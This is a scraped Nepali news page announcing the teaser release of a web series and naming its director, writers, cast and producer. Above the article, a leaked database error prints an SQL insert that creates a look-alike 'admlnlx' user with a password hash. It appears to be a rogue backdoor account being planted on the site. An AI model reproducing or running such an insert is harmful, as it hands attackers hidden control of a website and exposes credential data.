WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B08oNFJwkuJIFiIH8bHODxOVT1zuxx1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 03:12:11', '', 'admlnlx', 'admlnlx')

वेब सिरिज प्रेईसको टिजर सार्वजनिक – Gaule Khabar

वेब सिरिज प्रेईसको टिजर सार्वजनिक

वेब सिरिज प्रेईसको टिजर सार्वजनिक

काठमाण्डौं । नेपाली वेब सिरिज प्रेईसको टिजर सार्वजनिक भएको छ । युटुबमा हास्य टेली सिरियलहरुले राज गरिरहेको अवस्थामा यस सिरिजले अरु भन्दा फरक स्वाद दिन निर्देशक नविन काफ्लेले बताए ।

काठमाडौंको बिभिन्न ठाउँमा छायाँकन गरिएको नेपाली वेब सिरिज प्रेईसको छिट्टै पहिलो भाग ल्याउने निर्माण टोलीले बताए । बिनोद श्रेष्ठ र रेगल गौतमको कथा लेखनमा तयार गरिएको सिरजिमा अर्जुन कटुवाल, सानी ल्वागुन, कविता गौतम, मञ्जिता बस्नेत, निशा गिरी, भरत उपाध्यय, दिल्लीराज बटाला, निरज मोक्तान, उत्तम अधिकारी, टेकराज खत्री, अशोक योन्जन, किशोर बस्नेत, एकता पाण्डे, सन्ध्या लगुन र रियान क्षेत्रीको अभिनयमा निर्माण गरिएको यस सिरिज दामी क्रियसन युट्युब च्यानलबाट सार्वजनिक गरिने निर्माता शोभा अधिकारीले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका